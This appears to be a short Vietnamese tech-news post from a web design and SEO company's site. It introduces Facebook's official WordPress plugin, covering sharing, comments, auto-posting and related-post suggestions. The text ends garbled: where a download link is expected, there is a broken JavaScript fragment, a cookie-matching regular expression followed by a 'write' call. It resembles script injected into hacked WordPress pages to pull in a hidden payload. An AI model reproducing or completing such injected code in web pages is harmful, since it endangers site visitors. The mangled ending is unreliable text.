Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Plugin Facebook cho mã nguồn thiết kế web WordPress

Plugin Facebook cho mã nguồn thiết kế web WordPress

Mới đây mạng xã hội Facebook đã cho ra 1 plugin trên nền tảng mã nguồn mở WordPress giúp cho việc chia sẻ, tương tác được dễ dàng hơn.

WordPress hiện nay là mã nguồn mở dùng thiết kế website được sử dụng nhiều nhất với trên 17%. Việc xuất hiện plugin này giúp cho các biểu tượng chia sẻ của Facebook được phổ biến hơn và nội dung cũng được chia sẻ lan truyền mạnh mẽ hơn trên mạng xã hội.

facebook va wordpress

Với plugin mới này tác giả có thể thực hiện các chức năng như bình luận, tag, … cho facebook ngay trên website hoặc facebook cho dien thoai của mình. Mỗi bài viết mới được xuất bản đều có tùy chọn tự động đăng lên trang FB cá nhân hoặc Fanpage.c

Ngoài ra plugin cũng có tính năng gợi ý những bài đọc liên quan trên site wordpress của bạn qua thuật toán của Facebook.

Những comment trên website sử dụng  tài khoản facebook cũng có ảnh hưởng tốt đến việc tối ưu hóa công cụ tìm kiếm cho website ( SEO).

Các tính năng của plugin này tuy đã có từ lâu nhưng thường là phải sử dụng nhiều plugin khác nhau hoặc phải chèn mã code trực tiếp vào website gây bất tiện. Việc tích hợp vào 1 plugin duy nhất giúp website mượt hơn và có thể tương tác với khách hàng dễ dang hơn vì hiện nay số lượng người online , comment và like các nội dung trên Facebook là rất lớn.

Link download : Plugin Facebook cho WordPress (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘